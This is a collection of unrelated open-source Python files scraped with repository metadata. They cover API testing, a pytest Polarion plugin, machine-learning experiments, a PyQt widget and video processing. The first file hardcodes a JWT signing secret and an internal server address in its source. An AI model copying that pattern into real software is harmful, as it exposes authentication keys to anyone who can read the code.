\"adWqFeisdfD#1412$sdkf%23*afz&\"\n \n token = jwt.encode(payload, signKey, algorithm=\"HS512\")\n\n return token.decode(\"utf-8\")\n\ndef verify_bearer_token(token):\n signKey = \"adWqFeisdfD#1412$sdkf%23*afz&\"\n payload = jwt.decode(token, signKey, algorithms=[\"HS512\"])\n return payload\n\ndef create_timeStamp():\n global timeStamp\n millis = int(round(time.time()*1000))\n now = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(millis/1000))\n timeStamp = now\n return timeStamp\n\ndef save_itemStamp(str):\n file = open(\"../tmp/timeStamp.txt\", \"w\")\n file.write(str)\n file.close()\n\ndef get_itemId():\n tmp_path = os.path.abspath(os.path.join(os.getcwd(), \"../../tmp\"))\n timeStamp_path = os.path.join(tmp_path, \"itemId.txt\")\n file = open(timeStamp_path, \"r\")\n itemId = file.readline()\n file.close()\n print(\"---->itemId \" + itemId)\n return itemId\n\ndef get_ticketId():\n global ticketId\n token = create_token(userId, userName)\n r = requests.get(\"http://10.20.9.179:9310/api/online-tickets/v1/tickets/unused\",\n headers={\"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\",\n \"Authorization\": token\n },\n params={\n \"pageNum\": \"1\",\n \"pageSize\": \"1\",\n \"userId\": \"208283\",\n \"type\": \"RED_PACKET\",\n \"terminal\": \"PC\"\n }\n )\n if r.status_code == 200:\n print(\"---->reponse json: \" + str(r.json()))\n rq_json = r.json()\n rq_text = r.text\n rq_json_m = json.loads(rq_text)\n print(\"---->rq_json: \")\n print(rq_json)\n print(\"---->rq_text: \")\n print(rq_text)\n print(\"rq_json_m: \")\n print(rq_json_m)\n for key in rq_json_m.keys():\n if key == \"records\":\n for dic in rq_json_m[\"records\"]:\n ticketId = dic[\"ticId\"]\n print(ticketId)\n\ndef save_ticketId():\n print(\"---->ticketId: \" + str(ticketId))\n tmp_path = os.path.abspath(os.path.join(os.getcwd(), \"../../tmp\"))\n ticketId_path = os.path.join(tmp_path, \"ticketId.txt\")\n fopen = open(ticketId_path, \"w\")\n fopen.write(str(ticketId))\n fopen.close()\n\ntokenUser = create_token(userId, userName)\nitemId = get_itemId()\nitemId_m = int(itemId)\n\nprint(tokenUser)\nget_ticketId()\nsave_ticketId()\n\n\n# def get_itemId():\n# tmp_path = os.path.abspath(os.path.join(os.getcwd(), \"../../tmp\"))\n# timeStamp_path = os.path.join(tmp_path, \"timeStamp.txt\")\n# file = open(timeStamp_path, \"r\")\n# itemId = file.read()\n\n# tokenA = create_token(useridA, usernameA)\n# tokenB = create_token(useridB, usernameB)\n# print(tokenA)\n# print(tokenB)\n# print(verify_bearer_token(tokenA))\n# print(verify_bearer_token(tokenB))\n\n# create_timeStamp()\n# print(timeStamp)\n# save_itemStamp(timeStamp)\n","repo_name":"yiran423/api-test","sub_path":"testcases/online-tickets/debugtalk.py","file_name":"debugtalk.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24924252178","text":"# -*- coding: utf-8 -*-\n\"\"\"pytest plugin for collecting test cases from and recording test results to database.\"\"\"\n\nfrom __future__ import print_function, unicode_literals\n\nimport datetime\nimport re\nimport sqlite3\n\nimport pytest\n\n\ndef pytest_addoption(parser):\n \"\"\"Adds Polarion specific options to pytest.\"\"\"\n group = parser.getgroup(\"Polarion: options related to Polarion CFME plugin\")\n group.addoption('--db',\n default=None,\n action='store',\n help=\"SQLite file with tests results (default: %default)\")\n group.addoption('--skip-executed',\n default=False,\n action='store_true',\n help=\"Run only tests that were not executed yet (default: %default)\")\n\n\ndef pytest_configure(config):\n \"\"\"Registers plugin.\"\"\"\n db_file = config.getoption('db')\n if db_file is None:\n return\n\n with open(db_file):\n # test that file can be accessed\n pass\n conn = sqlite3.connect(db_file, detect_types=sqlite3.PARSE_DECLTYPES)\n\n # check that all required columns are there\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM testcases\")\n columns = [description[0] for description in cur.description]\n required_columns = (\n 'id', 'title', 'verdict', 'comment', 'last_status', 'time', 'sqltime')\n missing_columns = [k for k in required_columns if k not in columns]\n if missing_columns:\n pytest.fail(\n \"The database `{}` is missing following columns: {}\".format(\n db_file, ', '.join(missing_columns)))\n\n config.pluginmanager.register(PolarionCFMEPlugin(conn), '_polarion_cfme')\n\n\nclass PolarionCFMEPlugin(object):\n \"\"\"Gets Test Cases info and record test results in database.\"\"\"\n\n # specific to CFME (RHCF3)\n SEARCHES = [\n 'Skipping due to these blockers',\n 'SKIPME:',\n 'BZ ?[0-9]+',\n 'GH ?#?[0-9]+',\n 'GH#ManageIQ',\n ]\n\n def __init__(self, conn):\n self.conn = conn\n self.valid_skips = re.compile('(' + ')|('.join(self.SEARCHES) + ')')\n\n @staticmethod\n def get_testcase_name(item):\n \"\"\"Gets Polarion test case name out of the Node ID.\"\"\"\n return (item.nodeid[item.nodeid.find('::') + 2:]\n .replace('::()', '')\n .replace('::', '.'))\n\n def db_collect_testcases(self, items, skip_executed=False):\n \"\"\"Finds corresponding Polarion Work Item ID for collected test cases.\n\n Returns list of test cases found in the database.\n \"\"\"\n select = (\"SELECT id, title FROM testcases \"\n \"WHERE (verdict IS NULL OR verdict = '')\",\n \"AND (last_status IS NULL or last_status = '' or last_status = 'skipped')\")\n select = ' '.join(select) if skip_executed else select[0]\n cur = self.conn.cursor()\n cur.execute(select)\n polarion_testcases = cur.fetchall()\n\n # cache Work Item ID of every Polarion Test Case\n cached_ids = {}\n for testcase in polarion_testcases:\n work_item_id, title = testcase\n if title in cached_ids:\n print('{} is not unique, skipping'.format(title))\n del cached_ids[title]\n continue\n cached_ids[title] = work_item_id\n\n # save Work Item ID to corresponding items collected by pytest\n # and get list of test cases to run\n found = []\n for testcase in items:\n unique_id = self.get_testcase_name(testcase)\n work_item_id = cached_ids.get(unique_id)\n if work_item_id:\n testcase.polarion_work_item_id = work_item_id\n found.append(testcase)\n\n return found\n\n @pytest.hookimpl(trylast=True)\n def pytest_collection_modifyitems(self, config, items):\n \"\"\"Deselects tests that are not in the database.\"\"\"\n remaining = self.db_collect_testcases(items, config.getoption('skip_executed'))\n\n deselect = set(items) - set(remaining)\n if deselect:\n config.hook.pytest_deselected(items=deselect)\n items[:] = remaining\n\n print(\"Deselected {} tests using database, will continue with {} tests\".format(\n len(deselect), len(items)))\n\n def testcase_set_record(self, work_item_id, **kwargs):\n \"\"\"Updates Test Case record in database.\"\"\"\n cur = self.conn.cursor()\n\n cur.execute(\"SELECT verdict FROM testcases WHERE id = ?\", (work_item_id, ))\n verdict, = cur.fetchone()\n # don't override existing verdict\n if verdict:\n kwargs.pop('verdict', None)\n\n values = []\n keys_bind = []\n for key, value in kwargs.items():\n if value:\n keys_bind.append('{} = ?'.format(key))\n values.append(value)\n if not values:\n return\n values.append(work_item_id) # for 'WHERE' clause\n\n cur.execute(\"UPDATE testcases SET {} WHERE id = ?\".format(','.join(keys_bind)), values)\n try:\n self.conn.commit()\n # pylint: disable=broad-except\n except Exception:\n # will succeed next time hopefully\n pass\n\n def get_skip_reason(self, report):\n \"\"\"Check if there's a reason to mark test as 'skipped'.\"\"\"\n if report.longrepr:\n reason = report.longrepr[2]\n if self.valid_skips.search(reason):\n return reason\n return\n\n @pytest.hookimpl(hookwrapper=True)\n def pytest_runtest_makereport(self, item):\n \"\"\"Checks test result and update Test Case record in database.\"\"\"\n outcome = yield\n\n report = outcome.get_result()\n result = None\n comment = None\n last_status = None\n time = None\n\n if report.when == 'call':\n last_status = report.outcome\n time = str(report.duration)\n if report.passed:\n result = 'passed'\n elif report.skipped:\n comment = self.get_skip_reason(report)\n if comment:\n result = 'skipped'\n elif report.when == 'setup' and not report.passed:\n last_status = 'error' if report.failed else report.outcome\n if report.skipped:\n try:\n comment = item.get_marker('skipif').kwargs['reason']\n except AttributeError:\n comment = None\n\n if not comment:\n comment = self.get_skip_reason(report)\n if comment:\n result = 'skipped'\n\n if last_status:\n testrun_record = dict(\n verdict=result,\n comment=comment,\n last_status=last_status,\n time=time,\n sqltime=datetime.datetime.utcnow())\n self.testcase_set_record(item.polarion_work_item_id, **testrun_record)\n\n def pytest_unconfigure(self):\n \"\"\"Closes database connection.\"\"\"\n self.conn.commit()\n self.conn.close()\n","repo_name":"mkoura/pytest-polarion-cfme","sub_path":"pytest_polarion_cfme.py","file_name":"pytest_polarion_cfme.py","file_ext":"py","file_size_in_byte":7077,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"30142499697","text":"\"\"\"\r\n\n\nA **hexagonal grid** is a commonly used **game board design** based on\nhexagonal tiling. In the following grid, the two marked locations have a\nminimum distance of 6 because at least 6 steps are needed to reach the second\nlocation starting from the first one.\n\n![](https://edabit-challenges.s3.amazonaws.com/HiD.svg)\n\nWrite a function that takes a hexagonal grid with two marked locations as\ninput and returns their distance.\n\nThe input grid will be a list of strings in which each tile is represented\nwith `o` and the two marked locations with `x`.\n\n### Examples\n\n hex_distance([\n \" o o \",\n \" o x o \",\n \" o x \",\n ]) ➞ 1\n \n hex_distance([\n \" o o \",\n \" x o o \",\n \" o x \",\n ]) ➞ 2\n \n hex_distance([\n \" o o o \",\n \" o o o o \",\n \" o o o o o \",\n \" x o o x \",\n \" o o o \",\n ]) ➞ 3\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef hex_distance(grid):\n lst1,row,col=[],[],[]\n for i in range (len(grid)):\n lst=[0 if v == 'o' else 1 if v == 'x' else 'blank' for v in grid[i]]\n lst = list(filter(lambda x: x!= \"blank\", lst))\n lst1.append(lst)\n for i in range (len (lst1)):\n for j in range (len(lst1[i])):\n if (lst1[i][j]==1):\n row.append(i)\n col.append(j)\n if (row[0]==row[1]):\n return(abs(col[0]-col[1]))\n else:\n curr_row,curr_col,steps=row[1],col[1],0\n if (row[0] >= int(len(lst1)/2) and row[1] >= int(len(lst1)/2)):\n while not (curr_row==row[0]):\n if (col[0]<=col[1]):\n curr_row -=1\n steps+=1\n else:\n curr_row-=1\n steps+=1\n curr_col +=1\n return (abs(col[0]-curr_col)+steps)\n elif(row[0] < int(len(lst1)/2) and row[1] <= int(len(lst1)/2)):\n while not (curr_row==row[0]):\n if (col[0]<=curr_col):\n curr_row -=1\n if (curr_col>col[0]):\n curr_col -=1\n steps+=1\n else:\n curr_row-=1\n steps+=1\n return (abs(col[0]-curr_col)+steps)\n elif(row[0] < int(len(lst1)/2) and row[1] > int(len(lst1)/2)):\n while not (curr_row==row[0]):\n if (col[0]<=curr_col and curr_row > int(len(lst1)/2)):\n curr_row-=1\n steps+=1\n elif (col[0]<=curr_col and curr_row <= int(len(lst1)/2)):\n if (curr_col > col[0]):\n curr_col-=1\n curr_row-=1\n steps+=1\n elif(curr_col= int(len(lst1)/2)):\n curr_col+=1\n curr_row-=1\n steps+=1\n elif(curr_col OpNotImplemented: The following operators are not supported for frontend ONNX: TreeEnsembleRegressor\n\n# Define target system\nRUNTIME = tvm.relay.backend.Runtime(\"crt\", {\"system-lib\": True})\nboards_file = pathlib.Path(\n tvm.micro.get_microtvm_template_projects(\"zephyr\")) / \"boards.json\"\nwith open(boards_file) as f:\n boards = json.load(f)\nBOARD = \"nucleo_f746zg\"\nTARGET = tvm.target.target.micro(\"host\")\n# TARGET = tvm.target.target.micro(boards[BOARD][\"model\"])\n\n# Compile model\nwith tvm.transform.PassContext(opt_level=3,\n config={\n \"relay.FuseOps.max_depth\": 50,\n \"tir.disable_vectorize\": True\n },\n disabled_pass=[\"AlterOpLayout\"]):\n module = relay.build(mod, target=TARGET, runtime=RUNTIME, params=params)\n\ntemplate_project_path = pathlib.Path(tvm.micro.get_microtvm_template_projects(\"crt\"))\nproject_options = {}\n# template_project_path = pathlib.Path(\n # tvm.micro.get_microtvm_template_projects(\"zephyr\"))\n# project_options = {\"project_type\": \"host_driven\", \"board\": BOARD}\n\n# Create a temporary directory\ntemp_dir = tvm.contrib.utils.tempdir()\ngenerated_project_dir = temp_dir / \"generated-project\"\ngenerated_project = tvm.micro.generate_project(template_project_path, module,\n generated_project_dir,\n project_options)\n\n# Build and flash the project\ngenerated_project.build()\ngenerated_project.flash()\n\n# Run inference\nlast = dfy.iloc[-1]\nprediction = []\nn = []\nfor i in range(points - 1):\n n.append(last[\"a\" + str(i + 1)])\nn.append(last[\"target\"])\n\ndtype = \"float32\"\nwith tvm.micro.Session(\n transport_context_manager=generated_project.transport()) as session:\n graph_mod = tvm.micro.create_local_graph_executor(module.get_graph_json(),\n session.get_system_lib(),\n session.device)\n graph_mod.set_input(**module.get_params())\n\n for i in range(100):\n input0 = np.asarray(n, dtype=np.float32).reshape(1, -1)\n input0 = tvm.nd.array(input0)\n\n print(\"i={}, input0={}\".format(i, input0))\n graph_mod.set_input(\"input_0\", input0)\n\n graph_mod.run()\n\n tvm_output = graph_mod.get_output(0).numpy()\n\n n.append(tvm_output[0][0])\n n = n[1:]\n\n prediction.append(n[-1])\n\n\nplt.plot(np.arange(len(dfy)), dfy[\"target\"], c=\"green\")\nplt.plot(np.arange(len(dfy), len(dfy) + len(prediction)), prediction, c=\"red\")\nplt.show()\n","repo_name":"mshr-h/sandbox","sub_path":"tvm_/lightgbm_microtvm/lightgbm_microtvm.py","file_name":"lightgbm_microtvm.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19544744448","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nf = [2, 4, 6, 8, 10, 12]\n\n\n# In[2]:\n\n\ng = [e + 1 for e in f]\n\n\n# In[3]:\n\n\nprint(g)\n\n\n# In[4]:\n\n\nj = range(100)\n\n\n# In[5]:\n\n\ng = [e * 2 + 1 for e in j]\n\n\n# In[6]:\n\n\nprint(g)\n\n\n# In[21]:\n\n\n# built a working class which tells whether it is a sunna to eat dates in odd numbers.\nclass Prophet:\n def __init__(self, eating, food, numberfood):\n self.eating = eating\n self.food = food\n self.numberfood = numberfood\n def is_it_a_sunna(self):\n if self.food == \"date\" and self.numberfood % 2 > 0:\n print(\"It is said that it is a sunna to eat dates in odd numbers.\")\n\n\n# In[18]:\n\n\nMohamet = Prophet(True, \"date\", 3)\nMohamet.is_it_a_sunna()\n\n\n# In[21]:\n\n\n# now i want to incorporate the new list-comprehensive syntax into this class somehow.\nclass Prophet:\n def __init__(self, eating, food, numberfood):\n self.eating = eating\n self.food = food\n self.numberfood = numberfood\n def is_it_a_sunna(self):\n if self.food == \"date\" and self.numberfood % 2 > 0:\n print(\"It is said that it is a sunna to eat dates in odd numbers.\")\n def mathematize(self):\n c = [x * 2 for x in range(self.numberfood)] \n print(c)\n\n\n# In[22]:\n\n\nMohamet = Prophet(True, \"date\", 3)\nMohamet.mathematize()\n\n\n# In[28]:\n\n\n# problem presented at the end of vido #12:\n# create the list [36, 25, 16, 9, 4, 1] by append function and list comprehension\n# with append:\nc = []\nfor x in range(6, 0, -1):\n c.append(x ** 2)\nprint(c)\n\n\n# In[31]:\n\n\n# with list comp\nc = [x ** 2 for x in range(6, 0, -1)]\nprint(c)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"nau5ea/CSdojo-python-tutorial","sub_path":"list comprehension.py","file_name":"list comprehension.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7222876560","text":"import numpy as np\nimport pandas as pd\nimport chainer\nfrom chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils, Link, Chain, ChainList\nimport chainer.functions as F\nimport chainer.links as L\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nfrom typing import Tuple, Iterator\n\n\nclass DataSet:\n def __init__(self, input: np.ndarray, target: np.ndarray) -> None:\n assert input.shape[0] == target.shape[0]\n self._input = input\n self._target = target\n\n @property\n def size(self):\n return self._input.shape[0]\n\n @property\n def input(self) -> np.ndarray:\n return self._input\n\n @property\n def target(self) -> np.ndarray:\n return self._target\n\n def split(self, frac: float = 0.5) -> 'Tuple[DataSet, DataSet]':\n n_train = int(frac * self.size)\n shuffled = np.random.permutation(self.size)\n train_mask = shuffled < n_train\n test_mask = shuffled >= n_train\n return (DataSet(self._input[train_mask], self._target[train_mask]),\n DataSet(self._input[test_mask], self._target[test_mask]))\n\n\ndef load_iris_dataset() -> DataSet:\n iris = datasets.load_iris()\n input = iris['data'].astype(np.float32)\n target = iris['target'].astype(np.int32)\n return DataSet(input, target)\n\n\nclass AutoEncoder(Chain):\n def __init__(self, input_dimension: int, hidden_dimension: int) -> None:\n super().__init__()\n with self.init_scope():\n self.layer1 = L.Linear(input_dimension, hidden_dimension)\n self.layer2 = L.Linear(hidden_dimension, input_dimension)\n\n def __call__(self, x: Variable) -> Variable:\n output = self.forward(x)\n return F.mean_squared_error(output, x)\n\n def forward(self, x: Variable) -> Variable:\n code = self.encode(x)\n return self.layer2(code)\n\n def encode(self, x: Variable) -> Variable:\n return F.sigmoid(self.layer1(x))\n\n\ndef train(dataset: DataSet, n_iter: int = 3000, batch_size: int = 25) -> Iterator[AutoEncoder]:\n n = dataset.size\n\n input_dimension = dataset.input.shape[1]\n hidden_dimension = 2\n model = AutoEncoder(input_dimension, hidden_dimension)\n\n optimizer = optimizers.Adam()\n optimizer.setup(model)\n\n for j in range(n_iter):\n shuffled = np.random.permutation(n)\n\n for i in range(0, n, batch_size):\n indices = shuffled[i:i+batch_size]\n x = Variable(dataset.input[indices])\n model.cleargrads()\n loss = model(x)\n loss.backward()\n optimizer.update()\n\n yield model\n\n\ndef visualize(ax: plt.Axes, dataset: DataSet, model: AutoEncoder) -> None:\n x = Variable(dataset.input)\n code = model.encode(x).data\n\n for t in np.unique(dataset.target):\n mask = dataset.target == t\n ax.scatter(code[mask, 0], code[mask, 1])\n\n\ndef draw_learning_process(seed=12345) -> None:\n np.random.seed(seed)\n\n dataset = load_iris_dataset()\n fig = plt.figure(figsize=(10, 10))\n\n for epoch, model in enumerate(train(dataset)):\n if epoch % 250 != 0:\n continue\n ax = fig.add_subplot(4, 3, epoch//250 + 1)\n ax.set_title(\"epoch {}\".format(epoch))\n visualize(ax, dataset, model)\n\n fig.tight_layout()\n fig.show()\n\n\ndef draw_difference_by_initial_values(seed=12345) -> None:\n np.random.seed(seed)\n\n dataset = load_iris_dataset()\n fig, axes = plt.subplots(3, 3, figsize=(10, 10))\n\n for ax in axes.flatten():\n model = None\n for model in train(dataset):\n pass\n visualize(ax, dataset, model)\n\n fig.tight_layout()\n fig.show()\n","repo_name":"nojima/workspace","sub_path":"learning-chainer/ae.py","file_name":"ae.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"31470273117","text":"import numpy as np\nfrom numpy import random\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nimport scipy.optimize as so\n\nx = [2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0, 20.0]\ny = [0.7, 1.1, 1.5, 1.6, 1.7, 2.0, 2.3, 2.4, 2.2, 2.1, 2.4, 2.6, 2.2, 2.7, 2.5, 2.7, 2.8, 2.9, 3.1]\n\nx = np.array(x)\ny = np.array(y)\n\n\n# Method 1\n\nbest_fit_poly = np.polyfit(x,y,1)\npoly_m = best_fit_poly[0]\npoly_c = best_fit_poly[1]\n\n# Method 2\n\ndef cost(MC):\n m,c = MC\n cost = np.sum((y-m*x-c) ** 2)\n return cost\n\nresult = so.minimize(cost, (2.0, 2.0))\nopt_m = result.x[0]\nopt_c = result.x[1]\n\n# Method 3\ndef f(m,x,c):\n return m*x+c\n\nresult = so.curve_fit(f,x,y)\ncurve_m, curve_c = result[0]\nprint(curve_m, curve_c)\n\n\n# Plotting resulting lines with original data\nplt.plot(x,y, 'k.', label = \"Original Data\")\nplt.plot(x, poly_m * x + poly_c, 'r-', label = \"Polyfit\")\nplt.plot(x, opt_m * x + opt_c, 'b-', label = \"Optimize\")\nplt.plot(x, curve_m * x + curve_c, 'g-', label = \"Curve Fit\")\nplt.legend()\nplt.show()\n\nplt.close ()\n\nplt.plot(x,y,'o')\nplt.show()\nplt.close()\n\npolynomial_coeff = np.polyfit(x,y,3)\n\nxnew= np.linspace(2,20,100)\nynew = np.poly1d(polynomial_coeff)\nplt.plot(xnew,ynew(xnew),x,y,'o')\nplt.show()\n\n\n\n\n","repo_name":"katemcg93/ML_Stats","sub_path":"code_for_notebook/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42625923518","text":"from PyQt5.QtWidgets import QTableWidget, QTableWidgetItem, QPushButton, QMainWindow, QWidget, QGridLayout\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtCore import Qt, pyqtSlot, pyqtSignal\nfrom Model.Data import *\nfrom Utils.ErrorMessage import *\n\n\nclass ConditionTableWidget(QMainWindow):\n\n # initializing signal for creating condition\n conditionCreated = pyqtSignal(Tag, dict)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n self.headers = [\"Condition\", \"Condition Item\", \"Condition Item\"]\n\n # initialize aiml tag objects\n self.condition = None\n self.conItem = None\n\n self.conItemDict = dict()\n\n self.initTable()\n\n\n def initTable(self):\n self.setWindowTitle(\"Edit Condition\")\n self.mainSpace = QWidget()\n self.setCentralWidget(self.mainSpace)\n self.mainSpace.setLayout(QGridLayout())\n\n # initialize table and dimensions 3x3 to start\n self.mainSpace.tableWidget = QTableWidget()\n self.mainSpace.tableWidget.setRowCount(2)\n self.mainSpace.tableWidget.setColumnCount(2)\n\n # disabling cell (0, 1)\n disabled = QTableWidgetItem()\n disabled.setBackground(QColor(0, 0, 0))\n self.mainSpace.tableWidget.setItem(0, 1, disabled)\n disabled.setFlags(Qt.ItemIsEditable)\n\n # initializing labels for the table\n self.mainSpace.tableWidget.setVerticalHeaderLabels(self.headers)\n self.mainSpace.tableWidget.setHorizontalHeaderLabels([\"Variable Name/Value\", \"Response\"])\n\n # adding table to main widget\n self.mainSpace.layout().addWidget(self.mainSpace.tableWidget, 0, 0)\n\n # initialize contents in widget window\n self.create = QPushButton(\"Create\")\n self.addRow = QPushButton(\"Add Row\")\n self.delRow = QPushButton(\"Delete Row\")\n self.mainSpace.layout().addWidget(self.create, 1, 0)\n self.mainSpace.layout().addWidget(self.addRow, 1, 1)\n self.mainSpace.layout().addWidget(self.delRow, 1, 2)\n\n # click events\n self.addRow.clicked.connect(self.addRowClicked)\n self.delRow.clicked.connect(self.delRowClicked)\n self.create.clicked.connect(self.createClicked)\n\n self.show()\n\n def addRowClicked(self):\n self.mainSpace.tableWidget.insertRow(1)\n self.headers.insert(1, \"Condition Item\")\n self.mainSpace.tableWidget.setVerticalHeaderLabels(self.headers)\n\n def delRowClicked(self):\n row = self.mainSpace.tableWidget.currentRow()\n self.mainSpace.tableWidget.removeRow(row)\n self.headers.pop()\n self.mainSpace.tableWidget.setVerticalHeaderLabels(self.headers)\n # resetting disabled cell just incase first row was deleted\n disabled = QTableWidgetItem()\n disabled.setBackground(QColor(0, 0, 0))\n self.mainSpace.tableWidget.setItem(0, 1, disabled)\n disabled.setFlags(Qt.ItemIsEditable)\n\n def createClicked(self):\n try:\n self.condition = Condition(self.mainSpace.tableWidget.item(0, 0).text())\n print(self.condition)\n\n # storing condition items in a dictionary(k, v) where k = value of condition variable, and v = response\n allRows = self.mainSpace.tableWidget.rowCount()\n for row in range(1, allRows):\n self.conItemDict[self.mainSpace.tableWidget.item(row, 0).text()] = self.mainSpace.tableWidget.item(row, 1).text()\n print(self.mainSpace.tableWidget.item(row, 0).text())\n\n # emmitting signal\n self.conditionCreated.emit(self.condition, self.conItemDict)\n\n # closing window\n self.close()\n except Exception as ex:\n print(\"exception caught!\")\n handleError(ex)\n print(ex)\n","repo_name":"hojjatabdollahi/AIMLEditor","sub_path":"GUI/ConditionTableWidget.py","file_name":"ConditionTableWidget.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"11886529558","text":"#encoding=utf-8\nfrom businessView.AlertsettingView import SettingView\nfrom common.my_unit import StartTest\nfrom common.common_fun import Common\n\nclass TestSetting(StartTest):\n\n def test_setting(self):\n sett=SettingView(self.driver)\n sett.third_partlogin()\n self.assertTrue(sett.check_login())\n self.logger.info('start change setting')\n sett.alert_set()\n\n# if __name__ == '__main__':\n# unittest.main()\n","repo_name":"wangz0706/webselenium","sub_path":"test_case/test_setting.py","file_name":"test_setting.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23505285247","text":"from . import modules as modules_registry\n\n\ndef modules(request):\n \"\"\"Add current module and modules list to the template context.\"\"\"\n if not hasattr(request, 'user'):\n raise ValueError('modules context processor requires \"django.contrib.auth.context_processors.auth\"'\n 'to be in TEMPLATE_CONTEXT_PROCESSORS in your settings file.')\n\n module = None\n\n if request.resolver_match:\n module = getattr(request.resolver_match.url_name, 'module', None)\n\n return {\n 'modules': modules_registry.available_modules(request.user),\n 'current_module': module,\n }\n","repo_name":"bangq/django-wshop","sub_path":"extra_apps/material/frontend/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"32"} +{"seq_id":"18047522814","text":"import datetime, os, sys, argparse, glob, re, json, itertools\n\npathToUtils = \"lecture-daemon_data\"\n###append the path to basic data files\nsys.path.append(pathToUtils)\nimport fileUtils\n\nimport pandas as pd\nimport srt #python3 -m pip install srt \nfrom moviepy.editor import VideoFileClip #python3 -m pip install moviepy \nfrom moviepy.editor import *\nfrom moviepy.audio.AudioClip import AudioArrayClip\n\nfrom PIL import Image\nfrom pydub import AudioSegment #python3 -m pip install pydub \nimport audiosegment as audiosegwrap #python3 -m pip install audiosegment\nimport ffmpeg #python3 -m pip install ffmpeg-python\n\nimport numpy as np\n#brew install rubberband\nimport pyrubberband as pyrb #python3 -m pip install pyrubberband\n\n\ntheLeaderImage = \"lecture-daemon_data/leaderImage.png\"\n\nvideoSuffixList = ['.mp4', '.m4v', '.mov']\naudioSuffixList = ['.aiff', '.mp3', '.wav', \".m4a\"]\nimageSuffixList = ['.png','.jpg','.jpeg','.gif']\n\ntheSlateDuration = 3\noutroDuration = 5\n\ndef booleanCheck(theVariable):\n #assume theVariable is a string\n if theVariable.lower()==\"true\":\n return True\n else: \n return False\n\ndef pathExistsMake(thePath, makeBool=False):\n ###does the folder containing audio files exist?\n theFeedback=\" Path '%s' found: %s\"\n if os.path.exists(thePath)==False:\n print(theFeedback % (thePath, \"FALSE\"))\n if makeBool==False:\n print(\" Exiting.\")\n sys.exit()\n else:\n #Make the dir if it doesn't exist\n print(\" Creating dir '%s'\" % (thePath))\n os.mkdir(thePath)\n return os.path.abspath(thePath)\n else:\n print(theFeedback % (thePath, \"TRUE\"))\n return os.path.abspath(thePath)\n\ndef indexListMatchingElement(theList, theElement):\n checkedList = [] \n i=0\n for anELement in theList:\n if str(anELement) != theElement:\n checkedList.append(i) \n i=i+1\n return checkedList\n\ndef pydub_to_moviepy(theAudio, frameRate):\n if theAudio.channels < 2:\n #needs to be stereo for the conversion to a numpy arry to be OK\n #for then being used by moviepy\n print(\" Changing number of audio channels to two(2)...\")\n theAudio = audiosegwrap.from_mono_audiosegments(theAudio, theAudio)\n else:\n test = audiosegwrap.empty()\n theAudio = test+theAudio\n\n print(\" Converting audio to numpy array...\")\n theAudio = theAudio.to_numpy_array() #pydub convert to a numpy array\n #convert pydup numpy array to what moviepy wants\n #this is dirt and spit\n print(\" 32bit numpy array...\")\n theAudio = theAudio*3.05175781e-05\n theAudio = AudioArrayClip(theAudio, fps=frameRate) #moviepy read in numpy array\n theAudio.end = theAudio.duration\n return theAudio\n\n# def parse_ass_positioning(theText):\n# #look of '{\\an#}'' where # is between 1 &9, inclusive\n# #a failure will have a single element in the list (just text)\n# #a success will return [#,string]\n# #where # is the ASS keypad position on screen\n# #in the event no # is found, return a default of 2\n# theMatchedSplit = re.split('{an([1-9])}(.*)', theText)\n# if len(theMatchedSplit) < 2:\n# theMatchedSplit.insert(0,'')\n# theMatchedSplit.insert(1,2)\n# return theMatchedSplit\n\n# def ass_position_to_imageMagick_position(theNumber):\n# #http://docs.aegisub.org/3.2/ASS_Tags/\n# #https://imagemagick.org/script/command-line-options.php\n# #ASS number tags map like keypad #s\n# #the gravity cardinal values in imagemagick seem e-w inverted\n# #why?\n# if theNumber == 1: return \"SouthWest\"\n# elif theNumber == 2: return \"South\"\n# elif theNumber == 3: return \"SouthEast\"\n# elif theNumber == 4: return \"West\"\n# elif theNumber == 5: return \"Center\"\n# elif theNumber == 6: return \"East\"\n# elif theNumber == 7: return \"NorthWest\"\n# elif theNumber == 8: return \"North\"\n# elif theNumber == 9: return \"NorthEast\"\n# else: return \"Center\"\n\ndef resize(t,holdTime,theStartSizeW,theEndSizeW):\n #calculate the size at time t\n holdTime=float(holdTime)\n if t %s\" %(datetime.timedelta(seconds=theStart+float(lectureStartTime)), datetime.timedelta(seconds=theStop+float(lectureStartTime))))\n theStart = datetime.timedelta(seconds=theStart) #convert to datetime\n theStop = datetime.timedelta(seconds=theStop) #convert to datetime\n\n 